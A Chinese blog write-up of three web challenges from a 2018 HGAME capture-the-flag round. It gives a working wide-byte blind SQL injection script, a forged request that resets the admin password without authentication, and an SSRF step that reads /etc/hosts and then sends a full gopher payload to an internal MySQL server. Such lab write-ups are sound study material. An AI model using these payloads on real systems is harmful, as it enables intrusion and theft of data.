sky's blog

hgame-week4-web

web writeup
字数统计: 1,092阅读时长: 6 min
2018/02/25 Share

又双叒叕是SQLI

发现文件泄露index.php~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
    error_reporting(0);
    include("sql.php");
    $waf="/(union|group by|=|>|<|hex| |lower|strcmp|updatexml|xmlelement|extractvalue|concat|bin|sleep|mid\(|substr|left|ascii|\/\*|\*\/)/i";
    if(isset($_GET['user'])){
        if(preg_match_all($waf,$_GET['user'])!=0){
            $user="admin";
        }else{
            $user = str_replace("'","\'",$_GET['user']);
        }
        //echo $user."<br>";
        
        $sqli = new mysqli($host,$username,$passwd,$database);
        $sqli->set_charset("gbk");
        $query="select * from users where username='".$user."'";
        $result = $sqli->query($query);
        //echo $sqli->error;
        $num=0;
        @$num = $result->num_rows;
        if($num>0){
            while($row = $result->fetch_row()){
                echo $row[0]."&nbsp;&nbsp;&nbsp;&nbsp;".$row[1]."&nbsp;&nbsp;&nbsp;".$row[2]."<br>";
            }
        }
    }

还是比较容易的,可以发现like还在,所以我就直接写脚本了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import string
url = "http://118.25.18.223:10088/?user="
flag = ""
true_flag = ""
for i in range(1,1000):
    payload = flag
    for j in "0123456789"+string.letters+"!@#$^&*(){}=+`~_":
        #my = "%%df%%27%%0aor%%0a((select%%0adatabase())%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:])
        #my = "%%df%%27%%0aor%%0a((select%%0aTABLE_NAME%%0afrom%%0ainformation_schema.TABLES%%0awhere%%0aTABLE_SCHEMA%%0alike%%0adatabase()limit%%0a0,1)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #flllllag
        #my = "%%df%%27%%0aor%%0a((select%%0aCOLUMN_NAME%%0afrom%%0ainformation_schema.COLUMNS%%0awhere%%0aTABLE_NAME%%0alike%%0a0x666c6c6c6c6c6167%%0alimit%%0a2,1)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #notflag thisisflag
        my = "%%df%%27%%0aor%%0a((select%%0athisisflag%%0afrom%%0aflllllag)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #notflag thisisflag
        url1 = url+my
        r =requests.get(url=url1)
        if '998' in r.content:
            flag += hex(ord(j))[2:]
            true_flag += j
            print true_flag
            break

得到flag:

1
hgame{like!injection!so!g00d##}

散落的flag

一个js的题,大多数是未验证导致的问题,一共3个步骤
1.随便注册一个账号,登录成功给flag的1/3
2.伪装admin去get_userinfo(),给flag的1/3
3.修改admin密码登录,给flag的1/3
首先注意一下用户名和密码的格式

1
2
username = /^[a-zA-Z0-9]{5,}$/i;
password = /^[a-zA-Z0-9]{6,}$/i;

所以用户名5位以上,密码6位以上就行了,这个正则还是比较容易看懂的,不细说了
然后开始解题
1.注册账号
这里要手机验证码,也是很容易的,看1.js

1
2
3
4
5
6
7
8
9
10
function get_check(){
    var phone_num = $("#phone").val();
    var st = /^[\d]{11}$/i;
    if(st.test(phone_num)){
        $.post('get_phone_num.php',{phone:phone_num},function(data) {
            if(data!="error"){
                $("#check").val(data);
            }
        })
    }

我们直接在控制台调用即可获得验证码
然后注册成功

1
2
3
4
5
6
7
User Info

skycool

username: skycool

secret: hgame{0102940de1

2.更改密码
典型的未认证,抓包修改即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /change_pwd.php HTTP/1.1
Host: 118.25.18.223:10099
Content-Length: 31
Cache-Control: max-age=0
Origin: http://118.25.18.223:10099
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://118.25.18.223:10099/change_pwd.php
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=8cd13b83ef7b312e687c59c83e146907
Connection: close

username=admin&password=skycool

然后去登录admin用户

1
2
congratulation you get The last flag:
|98924acfce}|(竖线内的内容为最后一段flag)

3.直接调用get_userinfo()
我们看到http://118.25.18.223:10099/js/2.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
function get_userinfo(){
    var user = $("#user").text();
    $.ajax({ 
        url: "check_user.php",   
        type: "POST", 
        data:{username:user}, 
        dataType: "json", 
        error: function(){   
            $("#username").html('Error loading XML document');   
        },   
        success: function(data,status){
           $("#username").html("username: "+data[0]);
           $("#secret").html("secret: "+data[1]);
        } 
   });
}

$(document).ready(get_userinfo());

直接调用即可,我们将user更改为admin
可以得到

1
["admin","10c546b2cf68"]

于是flag完整了:hgame{0102940de110c546b2cf6898924acfce}

奇怪的SQLi

有文件泄露:/.git/
随手注册

1
2
admin%df'
admin

然后登陆成功,看到是curl
随手读

1
file:///etc/hosts

得到

1
127.0.0.1	localhost ::1	localhost ip6-localhost ip6-loopback fe00::0	ip6-localnet ff00::0	ip6-mcastprefix ff02::1	ip6-allnodes ff02::2	ip6-allrouters 172.17.0.2	mysql 77f62039fede 172.17.0.5 b6e0e267e603

发现是mysql,然后在.git恢复中发现被删除的config.php
得到用户名week4,数据库名users,无密码
发现是典型的gopher打mysql
给出参考链接

1
https://www.baidu.com/link?url=jC4dzIidPqY9lJSvUyNy2w8oFO63_llwUj1hnkGhNe_r1UVF7ZIyqUV457cSWT6ymMoU3a6i_ST9c2S02F_vkK&wd=&eqid=d2070bde00003288000000035a9502d1

就不细说了,最近也比较火,分析原理帖子很多,这里直接给出payload:

1
gopher://172.17.0.2:3306/A%2C%00%00%01O%B7%00%00%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00week4%00%00flag%00%60%01%00%00%03select%20concat%28cast%280x504b03040a00000000000000000000000000e8030000e803000010000000746869735f69735f7468655f666c6167%20as%20binary%29%2C%20rpad%28%28select%20hgame%20from%20galf%20where%20id%3D1%29%2C%201000%2C%20%27-%27%29%2C%20cast%280x504b01021e030a00000000000000000000000000100000000000000000000000000000000000746869735f69735f7468655f666c6167504b0506000000000100010036000000640000000000%20as%20binary%29%29%00%00%00%00

可以得到flag:

1
hgame{Th1s_Flaggggggggggg}

点击赞赏二维码,您的支持将鼓励我继续创作!
CATALOG
  1. 1. 又双叒叕是SQLI
  2. 2. 散落的flag
  3. 3. 奇怪的SQLi
Total : 225
2020
2019
2018
2017
web writeup crypto misc others cve paper ml IOT
web writeup crypto misc others paper